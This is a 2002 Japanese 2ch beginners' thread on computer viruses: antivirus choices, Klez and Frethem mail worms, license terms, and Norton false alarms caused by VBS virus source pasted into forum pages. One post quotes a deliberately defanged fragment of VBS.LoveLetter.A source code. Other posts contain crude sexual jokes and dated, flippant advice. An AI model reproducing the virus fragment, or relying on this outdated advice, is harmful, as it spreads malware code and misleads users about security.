ウィルスバスターのほうはどうでしょうか?

802 :Hannibal ◆I3SznmHM :02/07/15 12:04 ID:???
>>801
1年ごとに更新の為にお金がかかるのは何処も一緒だと思うのですが。
最初の1年は、ソフトの料金に含まれていると。

803 :801:02/07/15 12:05 ID:XRlLXNMA
>>802
そうなんですか、わかりました。
ありがとうございました。

804 :ひよこ名無しさん:02/07/15 13:30 ID:ujj4zPip
現在Norton AntiVirusを使っています。
友人はNoron Internet Securityを使っているのですがしばしば
ハッキングツールを使った侵入に遭い、ブロックしているそうです。
こんな話を聞くと不安になるのですが、Internet Securityに乗り換えたほうがいいでしょうか?
OSはWindows2000です。

805 :◆WINMEi3Y :02/07/15 13:43 ID:???
>>804
http://members.tripod.co.jp/eazyfox/

806 :ひよこ名無しさん:02/07/15 13:45 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

807 :Hannibal ◆I3SznmHM :02/07/15 14:13 ID:???
>>804
ぺ氏が載っけてるURLを読めばいいけど、タダでFire wallを構築できるツール
もあるので、それを入れておけば問題ないと思います。
今月のDOS/VSpecialがFire wall特集ですから、一読なさってみては。

808 :804:02/07/15 15:21 ID:ujj4zPip
>>805>>807
なるほど、便利なツールがありますね。導入してみます。
ありがとうございました。

Personal Firewallを買うハメになったら初めからInternet Security
買っときゃよかったって鬱になるところでした。

809 :786:02/07/15 17:42 ID:mO5N6krc
どなたか>>786,>>795をお願いします・・・

810 :ひよこ名無しさん:02/07/15 17:43 ID:???
>>809
捨ててしまえ

811 :ひよこ名無しさん:02/07/15 17:48 ID:???
>>809
ウイルシかもしんないから、ソッコーで削除してスキャンせい!

812 :786:02/07/15 17:57 ID:???
>>810
今は全て捨てるようにしています。

>>811
スキャンしても何も出てこないのですが、あまりにも怪しさ大爆発なので
気になってしょうがないです。何回か開いちゃったし。

813 :ひよこ名無しさん:02/07/15 17:59 ID:???
>>812
じゃ、も う だ め ぽ

814 :786:02/07/15 18:11 ID:???
>>813
そんなぁ・・・

815 :ひよこ名無しさん:02/07/15 18:13 ID:???
>何回か開いちゃったし

これが「致命的」!!リカバリすれ。

816 :メルトダウン:02/07/15 18:17 ID:???
>>786 で? HOTMAILなんて個人情報がだだ漏れのwebメール使って、
SPAMやウィルスメールが来ないほうがおかしいと思わないのか?
ほっとけ。

817 :786:02/07/15 18:18 ID:???
>>815
わかりました。リカバリます。
答えてくれた方々、どうもありがとうございました。

818 :ひよこ名無しさん:02/07/15 18:18 ID:???
>>786
ある日突然自宅に差出人不明の怪しい小包が届きました。
開けてみたところ爆弾が作動して肘から先が木端微塵に吹き飛びました。

こんな話を聞いて、人はどう思う?
差出人に対して、ヒドいことするなぁと思う一方で、
開けた奴に対しては、なんでそんなもん開けるの?バカじゃねーの?
と思うでしょう。今まさに、あなたはそう思われているのですよ(^^

819 :ひよこ名無しさん:02/07/15 18:19 ID:???
>>818
で?

820 :ひよこ名無しさん:02/07/15 18:27 ID:7h/9jpzL
最近2chで書き込むとウィルスに感染しましたって出るんだけど
みんな出てない?

VBS.LoveLetter.A

これってどうすればいいの?

821 :ひよこ名無しさん:02/07/15 18:27 ID:???
>>820
ある日突然自宅に差出人不明の怪しい小包が届きました。
開けてみたところ爆弾が作動して肘から先が木端微塵に吹き飛びました。

こんな話を聞いて、人はどう思う?
差出人に対して、ヒドいことするなぁと思う一方で、
開けた奴に対しては、なんでそんなもん開けるの?バカじゃねーの?
と思うでしょう。今まさに、あなたはそう思われているのですよ(^^

822 :ひよこ名無しさん:02/07/15 18:28 ID:???
>>820
上を読んだのか?488ぐらいを読め!

823 :ひよこ名無しさん:02/07/15 18:30 ID:???
トンマなヤツはここをよく読め!

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/



1 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
只今2chでvbsのウィルスのソースを貼り
ノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるので
このスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応
このスレで報告願えると幸いです。

基本(この問題について) >>2
既知の2chで話題になってるvbsソース >>3

2 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■この問題について■

2chのスレにvbsウィルスのソースを書き込むことによって
ブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたと
ノートン先生などが騒ぎます。(設定によっては反応しないことも
ありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されること
は無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダに
htmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
なので、まだ2chで話題に上がって無くても、Internet〜フォルダの
htmlファイルが感染したと警告が出た場合、同じ問題だと言えます。
(もちろん、全く問題無い)
これらのファイルは削除しても全く問題ありませんが、
該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされて
しまうので、警告が出ます。

3 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■既知のvbsウィルスのソース■

・VBS.Internal
出元はhttp://tmp.2ch.net/test/read.cgi/download/1025717301/
の197だと思われる。
ダウソ板からいろんな板へ飛び火した模様。

・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)
出元不明。ニュー速から?

824 :ひよこ名無しさん:02/07/15 18:33 ID:???
シクシクゴメンナサイトンマッテイワレタコトノホウガショックダタヨ

825 :ひよこ名無しさん:02/07/15 18:36 ID:???
トノマならほめ言葉づら。

826 :ひよこ名無しさん:02/07/15 20:43 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

827 :神之助:02/07/15 21:44 ID:LktoAJ4d
たまに別のスレに逝くと、ノートンアンチウィルスが察知して「感染していまし
た」などという画面がたまにでてきます。あれはなんなんですか?

828 :ひよこ名無しさん:02/07/15 21:45 ID:???
>>827
おまえは1つ前の書き込みも読まずに恥ずかしいと思わないのか?

829 :ひよこ名無しさん:02/07/15 22:11 ID:???
>>827
おまえー

830 :ひよこ名無しさん:02/07/16 02:18 ID:???
>>818
へったくそな例え話…。

831 :ひよこ名無しさん:02/07/16 08:30 ID:???
>>830
煽りはスピードが命。

素人さんは帰ってくれや。


832 :ひよこ名無しさん:02/07/16 09:09 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

833 :ひよこ名無しさん:02/07/16 10:04 ID:???
2月にXP(Home Edition)のパソコンを買ったんですが
ウィルス対策用のソフトは何を買えばいいでしょうか?
ネットはインターネットマンションなのでLANでつなぎっぱなしになるので
ファイアーウォールとかいうのも要るのでしょうか?

834 :ひよこ名無しさん:02/07/16 10:32 ID:???
>>833
ノートンインターネットセキュリティー

835 :ひよこ名無しさん:02/07/16 10:45 ID:???
>>833
ありがとうございます。
それにします。

836 :835:02/07/16 10:46 ID:lEKsIain
>>834の間違いでした。

837 :ひよこ名無しさん:02/07/16 10:56 ID:fHO5bszG
微妙にスレ違いかもしれませんが質問させてください・・・

セキュリティーソフトのウィルスバスターとノートンはどちらの方が売れているのですか?
また、どちらの方が性能が上ですか?

それと私は、ウィルスバスターを常駐させてるけど、起動時間が最低一分は長くなったり、
HPを開くスピードが遅くなったりしてるんだけど、皆さんもそうなるのですか?

838 :ひよこ名無しさん:02/07/16 11:07 ID:???
>>837
ウイルスバスタ2002使っているが起動時間は入れる前とほとんどかわりないけどねぇ〜

839 :ひよこ名無しさん:02/07/16 11:14 ID:zDZeyw2b
すいません、数ヶ月ぶりでこのスレに来たんですがフレゼムタンは流行りそうですか?

酷くなるようなら初心者の多い自サイトに警告メッセージ出そうと思っております。

840 :ひよこ名無しさん:02/07/16 11:47 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

841 :初心者:02/07/16 12:24 ID:l3ZzKLKm
すみません、どなたか宜しくお願い致します。
昨夜知人よりKLEZと思われるものが送信されてきました。
赤い英語の文字で書かれた内容でした。
私のパソコンはwindows98、IE6.0 です。
やはり感染したのでしょうか?
outlookのアドレス帳先には、私に送られてきたようなものは
まだ送られていないようです。
どなたか教えて下さい、お願い致します。

842 :ひよこ名無しさん:02/07/16 12:26 ID:???
>>841
>やはり感染したのでしょうか?

ウイルススキャンして下さい。お願いします。

843 :ひよこ名無しさん:02/07/16 12:49 ID:???
>>841
すぐ上のレス見た上での書き込みですか?
>★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!
と書いてますけど

844 :841:02/07/16 13:28 ID:WAZliitu
>>842-843さま、ありがとうございました。
ウィルススキャンしました。
全てのファイル・プログラムファイル・圧縮ファイル
感染している項目はありませんとなりました。



845 :ひよこ名無しさん:02/07/16 14:38 ID:???
スキャンしても定義ファイルがアップデートしていないと無駄だという罠

846 :ひよこ名無しさん:02/07/16 14:39 ID:cnD4s0F3
ウイルスに感染してしまい、すぐに友達に連絡して
メールはすぐに削除するように頼んだのですが友達にも感染してしまいました。
その子の職場のPCがそのウイルスのせいでクラッシュして仕事どころではなく、
処理に追われているようなのですが、その友達に対して、
どのような対処(?)をしたらいいのかわからないのです。
友達の職場のPCを復旧させるなど、もちろんそんな術などありません。
でも本当に申し訳なくて、もうどうしたらいいのかわかりません。
板違いのような気もするのですが、よろしくお願いします・・・

847 :ひよこ名無しさん:02/07/16 14:41 ID:???
>>846
ここの回答者はそういう経験をするのが嫌で
こまめに対策している人達が主だと思われ。

848 :ひよこ名無しさん:02/07/16 14:41 ID:???
>>846
ウイルス対策をしてなかった自分自身を呪え!損害賠償が
発生するかもしれないからそのつもりで。

849 :ひよこ名無しさん:02/07/16 14:44 ID:???
>>846
その会社もDQNだ、ほっとけ

850 :ひよこ名無しさん:02/07/16 14:44 ID:???
住○生命の元気だネットにアドレスを登録していたらウイルスメールが
いぱーいきました。W32.Frethem.K@mmウィルスなので注意してね

851 :ひよこ名無しさん:02/07/16 14:45 ID:???
>>848
その場合、損害賠償はかなりの額だと思われ。


852 :ひよこ名無しさん:02/07/16 14:47 ID:???
>>850
生命保険会社がウイルスメールを撒くとは・・・世も末だな。w

853 :ひよこ名無しさん:02/07/16 14:50 ID:???
>852
国会議員のセンセイがウィルス撒いてた事もあったよ


と今更なレスをしてみる

854 :ひよこ名無しさん:02/07/16 14:51 ID:???
>>853
そんなこともあったな・・・w

855 :846:02/07/16 14:52 ID:cnD4s0F3
>847・848・849
とりあえず友達に経過を聞きながら待ってみます。
未だにウイルスは遠いどっかの事みたいに思ってた自分が情けないです。
レスありがとうございました。


856 :ひよこ名無しさん:02/07/16 14:53 ID:???
>>855
今すぐ、ウイルス対策ソフトを買え!最低限のことはしろ。
ヤなら、ネットするな。

857 :846:02/07/16 14:59 ID:cnD4s0F3
>856
もちろん買いました。ウイルスバスター2002の2枚入っているのを買って、
一枚は友達に渡してきました。
それ以上に何かできる事があればと思って書き込みました・・・

858 :荒岸 ◆MONa3xWM :02/07/16 15:01 ID:???
それはそれでライセンス違反のような…つーか、そんなお徳用パックみたいな
パッケージ形態してるのバスターは?

859 :ひよこ名無しさん:02/07/16 15:01 ID:???
>>857
「ウイルス定義」の更新はしていたのか?メーラーのプレビューはOFF
にしていたのか?怪しげなメールは削除していたのか?・・・対策は尽きない。

860 :ひよこ名無しさん:02/07/16 15:02 ID:???
>>858
そんなのありましたっけ?

861 :ひよこ名無しさん:02/07/16 15:05 ID:???
ノートンなら2ライセンスパッケージというのがあったような…

862 :846:02/07/16 15:07 ID:cnD4s0F3
>858
ラ、ライセンス違反?!
2ユーザーパックというのがあったので、普通に2枚入りと思って買って
すぐに渡してしまいました・・・
>859
このスレ見てこれから勉強しようと思います。


863 :ひよこ名無しさん:02/07/16 15:07 ID:???
>>861
それはあった気がする。バスターであったかなぁ・・。

864 :ひよこ名無しさん:02/07/16 15:08 ID:???
>>862
ちょっと聞くけど、「ウイルス定義」の更新してたの? 

865 :荒岸 ◆MONa3xWM :02/07/16 15:11 ID:???
なるほどねぇ。私も勉強不足だなぁ。

866 :846:02/07/16 15:13 ID:cnD4s0F3
>863
お恥ずかしいのですが今まで何の対策もしていませんでした。


867 :ひよこ名無しさん:02/07/16 15:14 ID:???
>>866
じゃ、今からやってくださいな。おながいしますよ。w

868 :846:02/07/16 15:19 ID:cnD4s0F3
>867
はい。わかりました。
「ウイルスの定義の更新」自体何かよくわからないので
今から調べて、それからやってみます。ありがとうございました。

869 :ひよこ名無しさん:02/07/16 15:23 ID:???
>868
ウイルスバスター2パックは他人に渡すとライセンス違反です。

870 :ひよこ名無しさん:02/07/16 15:27 ID:???
>>868
明らかに「ライセンス違反」。

本製品は、第三者に対して、賃貸、賞与、販売、ならびに譲渡するこ とはできません。但し、同一のお客様がお使いになるPC2台(及び2OS)、または同一世帯、同一事業所内に設置されている2PC(及び2OS)でお使いになる場合、この規定は適用されません。

と書いてあるじゃん!友達に渡しちゃダメだよ。



871 :846:02/07/16 15:28 ID:cnD4s0F3
>869
そうなんですか?!
じゃ、私が持っている方も友達に渡してきます・・・

872 :ひよこ名無しさん:02/07/16 15:29 ID:???
>>871
え!?何言ってんの?

873 :ひよこ名無しさん:02/07/16 15:30 ID:???
>>869
あ、ほんとだ、鋭い指摘。
1人の顧客が2台のPCにインストールする権利で譲渡不可だもんね。

874 :ひよこ名無しさん:02/07/16 15:31 ID:???
>>871
それで自分の分あらたに買うなら
新しく買ったほうを渡せば?

つーかそいつも対策してないのが悪いんだが

875 :荒岸 ◆MONa3xWM :02/07/16 15:33 ID:???
>>871

お友達に渡してある分を回収して、ご友人には新規に購入してもらわないとダメですね。
つーか、今まで全くウィルス対策してないわけですか。不特定多数の人間とスキン無しで
性交してるのと同義ですよ。

876 :ひよこ名無しさん:02/07/16 15:35 ID:???
>>875
上手い!流石、荒タン!!w

877 :荒岸 ◆MONa3xWM :02/07/16 15:38 ID:???
いや、以前このスレでテンプレになってた奴が忘れられなくて…
ナマでパコパコ…とかいうやつ。

878 :しんふい:02/07/16 15:38 ID:15osui4/
Windows XP を買いたいのですが、今新品の最低価格っていくらぐらいでしょうか?


879 :ひよこ名無しさん:02/07/16 15:39 ID:???
>>878
OSですか?PCですか?

880 :846:02/07/16 15:39 ID:cnD4s0F3
>872〜875
なんかパニクってしまって訳アホな事ばかり言ってしまってすいません。
新しく買って渡しに逝ってきます。


881 :ひよこ名無しさん:02/07/16 15:40 ID:???
>>877
あ、なるほど・・・。いや、エッチな荒タンだから、それに掛けたのかと
思ってますた。w

882 :しんふい:02/07/16 15:41 ID:15osui4/
あ、ごめんなさい。ウイルスのスレットにかいてしまった・・・。
失礼しました。

883 :しんふい:02/07/16 15:42 ID:15osui4/
879さん
レスどうもです・・・。OSです。


884 :ひよこ名無しさん:02/07/16 15:43 ID:???
日本橋ならワゴン車のおっさんから5Kで・・・

885 :ひよこ名無しさん:02/07/16 15:43 ID:???
荒タン(*・∀・*)ヤーネェ

886 :ひよこ名無しさん:02/07/16 15:45 ID:???
>>883
スレ違いだから、誘導されたことを断って質問スレで
質問し直すか、自分で調べてちょ!

パソコン初心者板総合質問スレッドVol.88
http://pc.2ch.net/test/read.cgi/pcqa/1026776816/l50

887 :ひよこ名無しさん:02/07/16 15:46 ID:???
>>877
「ナマでパコパコ」・・・(・∀・)イイ!!

888 :対策汁!!!!!:02/07/16 15:51 ID:???
ナマでパコパコ!!!!

インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?

889 :ひよこ名無しさん:02/07/16 15:54 ID:???
>>888
ソープランドのマンコ のほうが安全かもしれん


890 :ひよこ名無しさん:02/07/16 15:54 ID:???
>>889
禿同

891 :荒岸 ◆MONa3xWM :02/07/16 16:21 ID:???
>>888

そうそう、これこれ。よく出来てると思いますが、実際ソープのおねーちゃんのほうが
アマチュアの人より対策済みな気もしますね。

892 :ひよこ名無しさん:02/07/16 16:25 ID:???
彼岸さんはソープ経験あり、っと・・・φ(・∀・ )

893 :ひよこ名無しさん:02/07/16 16:25 ID:???
実際、素人女の方がぁ ゃ ι ぃ  。風俗なら定期健診してるし
「ウイルシ」持ってたら治るまで店に出られないからなぁ。

894 :ひよこ名無しさん:02/07/16 16:26 ID:???
>>891
お勧めのプーソーは何処でしか?w

895 :ひよこ名無しさん:02/07/16 16:28 ID:???
>>893
「ウイルシ」は治せるの?人間は再インストールできないよ。

菌とかクラミジアは削除できるでしょうけど、、、

896 :某店店長:02/07/16 16:30 ID:???
>>893
そんなことあったのはバブル期の頃の話でして・・・
バブルはじけちゃった今では・・・

897 :ひよこ名無しさん:02/07/16 16:32 ID:???
やってないのか・・・欝だ。

898 :荒岸 ◆MONa3xWM :02/07/16 16:33 ID:???
>>894


>>896さんのお店はいかがでしょうか。

899 :ひよこ名無しさん:02/07/16 16:34 ID:???
ウイスル対策してない奴も性病対策してない奴もみんな死んでしまえ

900 :ひよこ名無しさん:02/07/16 16:34 ID:???
>>898
怖いから、遠慮します。

901 :ひよこ名無しさん:02/07/16 16:34 ID:???
>>899
オマエモナーw

902 :ひよこ名無しさん:02/07/16 16:38 ID:???
「性病対策」はさしずめ「イソジン」と「ムーゴしかないのか・・・。
怖いな、淋しい病気。

903 :ひよこ名無しさん:02/07/16 16:43 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

904 :某店店長:02/07/16 16:46 ID:???
>>898
神戸の震災後がピークでしたねぇ。

905 :ひよこ名無しさん:02/07/16 18:07 ID:B7f3+GLc
ウイルスをMcAfeeが検知して、削除しました。
管理者からの報告によるとw32.frethem.j@mmというウイルスだそうで、
passwordがどうのこうのという文章で騙して感染させてしまうらしいです。

そのあと別のメールが来て、よくみると本文のあとに大量の文字化けと
”Your Password is ほにゃらら”
という不穏な英文がついていました。
これは相手のマシンが感染しているということなのでしょうか。
既にプレビューで見てしまったのですが、影響はないでしょうか。
ウイルス初心者ですみませんが教えてください。

906 :ひよこ名無しさん:02/07/16 18:09 ID:???
>>905
> 既にプレビューで見てしまった
もうだめぽ

907 :ひよこ名無しさん:02/07/16 18:12 ID:???
>>905
最新のウイルス定義ファイルで全ドライブ検索して下さい。お願いします。
できればMcAfeeをアンインストールして、ウイルスバスターかノートンにして下さい。

908 :905:02/07/16 18:25 ID:B7f3+GLc
うわああん。ごめんなさい。汗ってtいるせいか定義ファイルの更新方法がぜんっぜんわかりません。
他のすれでも言われたけどここも上のレスをよくみると馬鹿フィーとか書いてあるし。
非常に申し訳ないのですが、至急教えてください。

909 :ひよこ名無しさん:02/07/16 18:26 ID:???
>>908
LiveUpdate

910 :905:02/07/16 18:38 ID:B7f3+GLc
馬鹿フィーのサイトから定義ファイルをダウンロードして
Zipを解凍しました。ここからどうすればいいのか不安です。
VALIDATE.EXEというのを実行すればいいのですか?

911 :905:02/07/16 18:40 ID:B7f3+GLc
マニュアルみつけました。すみません。
http://www.nai.com/japan/download/dat_howto.asp

912 :ひよこ名無しさん:02/07/16 18:41 ID:???
>>910
そのサイトに説明なかったかい? 

913 :905:02/07/16 18:43 ID:B7f3+GLc
あれっ!?プロパティなんかないぞ。どういうことだ。
あかん、疲れてきた。今日は情報ケーブル抜いて帰ります。
明日ゆっくり考える。

914 :ひよこ名無しさん:02/07/16 18:45 ID:???
>>913
ここにどうぞ!w
夢・独り言 http://life.2ch.net/yume/

915 :905:02/07/16 18:54 ID:???
>>914 お気遣いすみません。
管理者でないとダメみたいです。もうめんどくさくなってきた。

916 :ひよこ名無しさん:02/07/16 18:55 ID:???
>>915
じゃ、明日にしたら?上司いないんでしょ?w

917 :ひよこ名無しさん:02/07/16 19:23 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

918 :ひよこ名無しさん:02/07/16 21:28 ID:???
sa

919 :ひよこ名無しさん:02/07/16 22:02 ID:o5FLqiGQ
ウイルス解説のページなどを見てみたのですが、分からなかったので質問します。
メール受信中に途中で止まり、「不正な処理を行ったため〜」と出て、
Outlookが強制終了されてしまいます。
何度受信しても特定のメール(18件中8件目)で強制終了になってしまい、
7通目までのメールは同じものが何度も受信されるのですが、8通目以降の
メールが受信できません。この8通目のメールがウイルス?なのでしょうか?

初心者なもので、ものすごくくだらない質問でしたらスマソです。
分かる方いらしたら教えてください。


920 :Hannibal ◆I3SznmHM :02/07/16 22:31 ID:???
とりあえず…。

「WORM_FRETHEM.K」駆除ツールだよん。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=4305
ダウンロードしてダブルクリックしたらOKみたい。

921 :ひよこ名無しさん:02/07/16 22:52 ID:ASCA3xB7
至急です。
ファイルが添付されたメールの削除法を教えてください。
OSはウインドウズ98でiEは5、5です。
あっもちろんノートンでウィルススキャンやりまして
まったく出なかったのです。

922 :ひよこ名無しさん:02/07/16 22:53 ID:???
>>921
削除するだけじゃん。

923 :ひよこ名無しさん:02/07/16 22:59 ID:???
なにが、至急です、だよボケが。
てめーの都合なんぞ知ったことじゃねぇんだよカス

924 :ひよこ名無しさん:02/07/16 23:01 ID:???
こらっ初心者が真面目にそうだんしているんだよ。

925 :ひよこ名無しさん:02/07/16 23:03 ID:???
>>921
メールの質問をするならメールのクライアントソフトを書いたほうがいいぞ。
ブラウザメールなのか?

926 :ひよこ名無しさん:02/07/16 23:04 ID:???
>>921
あと、POPサーバなのか、IMAPなのかも書いてくれ。

927 :ひよこ名無しさん:02/07/16 23:06 ID:???
>>921
メールがプレビューされないようにしてから、メールを選択し
削除ボタンを押す。
削除済アイテムホルダを空にする
        以上。

928 :ひよこ名無しさん:02/07/16 23:06 ID:???
OEです。

929 :ひよこ名無しさん:02/07/16 23:07 ID:???
>>928
あなたは誰?


930 :ひよこ名無しさん:02/07/16 23:07 ID:???
>>928
アンタ誰?

931 :ひよこ名無しさん:02/07/16 23:10 ID:???
>>928
誰だお前?

932 :ひよこ名無しさん:02/07/16 23:11 ID:???
>>929
OEです

933 :ひよこ名無しさん:02/07/16 23:11 ID:???
>>932
( ゚Д゚)ハァ?

934 :ひよこ名無しさん:02/07/16 23:13 ID:???
>>1-933
お前ら、いったい誰だ?

935 :ひよこ名無しさん:02/07/16 23:13 ID:???
>>927さん
適切なアドバイスをありがとう。
早速削除してみます。
また「あほ・ばか」言われそうだけどメールがプレビューされないようにしてと
いうのはどういうふうにしたらいいのですか。

936 :ひよこ名無しさん:02/07/16 23:15 ID:???
>>935
誰だお前?


937 :荒岸 ◆MONa3xWM :02/07/16 23:15 ID:???
>>935

ttp://homepage2.nifty.com/winfaq/c/oetips.html#637
どうでもいいけどID出しなさいよ。

938 :ひよこ名無しさん:02/07/16 23:16 ID:???
>>935
目を閉じて、キーボードで操作。
添付ファイルがグロ画像だった時にも安心。

939 :ひよこ名無しさん:02/07/16 23:16 ID:???
>>935
ツール→オプションでできるけど、OEは使わない方がいいよ。
違うメーラーにしちゃえば?

940 :ひよこ名無しさん:02/07/16 23:18 ID:???
>>935
本物の>>921ならおしえてやるIDだしてみ

941 :ひよこ名無しさん:02/07/16 23:18 ID:ASCA3xB7
>>937
ついつい野鳥板のくせでID隠してしまった。

942 :ひよこ名無しさん:02/07/16 23:20 ID:???
ホンモノ キタ━━━━(゚∀゚)━━━━!!

943 :ひよこ名無しさん:02/07/16 23:20 ID:???
>>941
「名前欄」は「発言番号」にしてね。

944 :ひよこ名無しさん:02/07/16 23:24 ID:???
>>941
OEなら 表示→レイアウトでプレビューウインドウを表示するの
チェックをはずしてOKボタンを押す。


945 :ひよこ名無しさん:02/07/16 23:25 ID:???
なにが、至急です、だよボケが。
てめーの都合なんぞ知ったことじゃね

946 :ひよこ名無しさん:02/07/16 23:25 ID:???
>>945
遅い


947 :921:02/07/16 23:28 ID:ASCA3xB7
>>943
わかりました。

948 :ひよこ名無しさん:02/07/16 23:36 ID:???
>>947
で メーラーはOEなの何? OEなら>>944を見れ

949 : :02/07/16 23:48 ID:ZCG8Zead
ウイルスに関して質問です。
板違いで誘導されてきました。

IEコンポーネントをHTMLメール表示の手段に用いているメーラというのは
具体的にどのメーラーか知りたいのですが。
OE、Becky!はわかりました。

あと、Frethemに関してですが、パッチ当ててない場合は
プレビューで感染(IEコンポーネントをHTMLメール表示の手段に用いているメーラはすべてだめですよね)
、当ててあれば実行しない限り大丈夫ということで
OKでしょうか?

プレビューしたらアウトという書き方がありますが、
IE5.5or5.0SP2か6ならプレビューだけでは感染しないのですよね?



よろしくお願いします。

950 :ひよこ名無しさん:02/07/16 23:52 ID:???
>>949
少なくとも、BeckyはIEコンポーネントを使わずに、htmlのテキスト部分のみを
表示する機能があるので、ダメということは無い。

951 : :02/07/17 00:00 ID:KKwmK3xw
>>950
ありがとうございました。Beckyに関してはユーザーじゃなかったので
よくわかりませんが、切り替え機能?があるのですね。

しつこくて申し訳ないのですが、
パッチ当ててSP2にしてない場合だけプレビューで感染ということで
よろしいでしょうか?

失礼します。

952 :ひよこ名無しさん:02/07/17 00:02 ID:???
>>951
現在公開されているパッチを全て当てておけばある程度は大丈夫かもしれないが、
セキュリティホールは次々発見されているから、IEを使っている限り安心できない。

953 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/17 00:04 ID:???
>>952
>セキュリティホールは次々発見されているから、IEを使っている限り安心できない。
この世にあるすべてのソフトにおいて言えることかと。


954 : :02/07/17 00:07 ID:KKwmK3xw
>>952
ありがとうございます。安心しているつもりはないです。
対策はそれなりしますし、しております。

あくまでFrethem(バッドトランスなども?)に関しては
SP2ならいいはずだと思ってたんですが、
ちょっと自信なくなったので。
今後どうかはわからないというのは存じております。

ありがとうございました。またご指導ください。

955 :ひよこ名無しさん:02/07/17 00:14 ID:???
>>952
俺はもう十年ぐらいIE、OE使っててなんの問題もないが

956 :ひよこ名無しさん:02/07/17 00:23 ID:???
>>955
10年ね。フーン

957 :ひよこ名無しさん:02/07/17 00:24 ID:???
>>956
ま・さ・か!

958 :ひよこ名無しさん:02/07/17 01:00 ID:CjBVdyp1
新スレは?

959 :ひよこ名無しさん:02/07/17 01:16 ID:???
>>958
立てれる人間が居ない。誰かが批判要望板にゴルァ!!してくれたら立てたげる

960 :ひよこ名無しさん:02/07/17 01:25 ID:???
( ゚Д゚)ゴルァ!!

961 :921:02/07/17 01:44 ID:hiVAwg9t
ファイルが添付されたメール削除出来ました。
返事が遅くなったのは、ウィルス感染がちょっと心配になり(メール削除のとき
あせった)ウィルススキャンをかけていたためです。
もちろんウィルスに感染していませんでした。
2ちゃんねるの大先輩、アドバイスをありがとうがざいました。

962 :ひよこ名無しさん:02/07/17 01:46 ID:???
>>961
よかったね。

963 :ひよこ名無しさん:02/07/17 01:49 ID:???
>>955
おまえ、OEが生まれて何年か知ってるのか

964 :ひよこ名無しさん:02/07/17 11:29 ID:???

☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

965 :921:02/07/17 13:34 ID:hiVAwg9t
すいません。
2ちゃんねるのセキュリティ板を見ていたら
ノートンが作動して「C:\WiNDOWS\Tempor」というファイルが
ウィルスに感染しているという表示が出て
すぐに検疫(隔離)しました。
ネットから接続を切ってからノートンを見てみたら
ウィルスの治療法、ファイルを削除して同じファイルをコピーすることと
出ていました。
でもパソコン初心者の僕にとっては
どういうふうにやったらいいのかわかりません。
ファイルを削除しても大丈夫でしょうか?
2ちゃんねるの諸先輩がたよろしくお願いします。
少しあせっています。

966 :ひよこ名無しさん:02/07/17 13:37 ID:???
>>965
ヲマエは1つ上のレスも読めないのか?

967 :921:02/07/17 13:50 ID:hiVAwg9t
>>966
読んだけど自分みたいな例が載っていないのです。


968 :ひよこ名無しさん:02/07/17 13:53 ID:???
 

969 :ひよこ名無しさん:02/07/17 14:04 ID:???
>>967
このスレ熟読しろ。そしてもう来るな。


970 :921:02/07/17 14:10 ID:hiVAwg9t
>969
読むのに長すぎます。
鬱。

971 :ひよこ名無しさん:02/07/17 14:13 ID:???
■この問題について■

2chのスレにvbsウィルスのソースを書き込むことによって
ブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたと
ノートン先生などが騒ぎます。(設定によっては反応しないことも
ありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されること
は無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダに
htmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
なので、まだ2chで話題に上がって無くても、Internet〜フォルダの
htmlファイルが感染したと警告が出た場合、同じ問題だと言えます。
(もちろん、全く問題無い)

これらのファイルは削除しても全く問題ありませんが、
該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされて
しまうので、警告が出ます。

972 :921:02/07/17 14:39 ID:hiVAwg9t
>>971
削除しないでもいいんですね。


